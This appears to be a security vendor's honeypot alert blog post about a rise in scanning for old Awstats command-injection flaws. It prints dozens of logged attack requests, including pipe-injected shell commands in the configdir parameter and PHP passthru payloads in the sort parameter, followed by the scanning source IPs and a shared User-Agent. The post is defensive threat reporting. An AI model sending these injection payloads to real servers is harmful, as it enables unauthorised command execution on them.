LevelBlue

LevelBlue + SentinelOne Partner to Deliver AI-Powered Managed Security Operations and Incident Response. Learn More

Submit RFP Request a Demo

[Honeypot Alert] Awstats Command Injection Scanning Detected

Change theme to light
3 Minute Read by Ryan Barnett

Issue Detected

Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs:

GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1

According to OSVDB - there are two different vulnerabilities that they are probing for:

Both of these vulnerability disclosures are old (2005 and 2008) so we are unsure why there is a sudden uptick in scanning. If you are running Awstats software, you should make sure you are updated: http://awstats.sourceforge.net/

Scanning Source Information

The scanning came from 59 different IP address (a few are resolved to hostnames) -

114.32.226.22118.122.178.65118.97.50.11121.166.70.252122.255.96.164122.255.96.45151.1.183.216159.213.90.53162-119-162-69.reverse.lstn.net180.76.5.49180.76.5.91187.45.213.158190.40.2.40190.95.200.250200.175.53.196202.100.80.21202.28.37.63203.142.24.17211.144.82.8211.167.110.2212.252.120.11212.49.222.82212.92.13.110213.195.75.188219.94.144.230220.162.244.251220.179.64.2358.254.143.20458.254.202.10358.63.241.20959.108.108.10059.163.254.1861.19.45.11962.183.105.16462.225.155.9065.255.176.2667.55.95.13268.78.199.24769.162.119.16278.131.55.17280.248.214.10381.169.165.13881.92.159.19482.193.36.9882.228.250.16385.18.206.22885.88.195.3485.88.195.3587.242.99.16688.173.34.14488.40.179.24289-97-247-147.ip2.fastwebnet.it89.208.95.13093.84.116.21695.87.194.7byr09a.trigger.co.zamail.gymnaziumdc.czmail.ring.hupd5cdac.szokff01.ap.so-net.ne.jp

While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0.

This leads us to believe that the attack was carried about by the same source client.

ABOUT LEVELBLUE

LevelBlue secures what's next with intelligence-led security delivering visibility and speed to stop threats faster. As the world’s largest and most analyst-recognized pure-play managed security services provider, our AI-powered managed services and cyber expertise across managed, advisory, and incident response services help clients operate with confidence. Learn more about us.

https://www.levelblue.com/resources/blogs/internal-blog/how-to-create-a-blog-post/

Latest Intelligence

The Device Code Phishing Tsunami: What We’re Seeing in the Wild
macOS ClickFix Social Engineering Campaigns
ClickFix Is Now Hiring: From Job Platform Impersonation to Python-Based RAT Delivery

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.
© Copyright 2026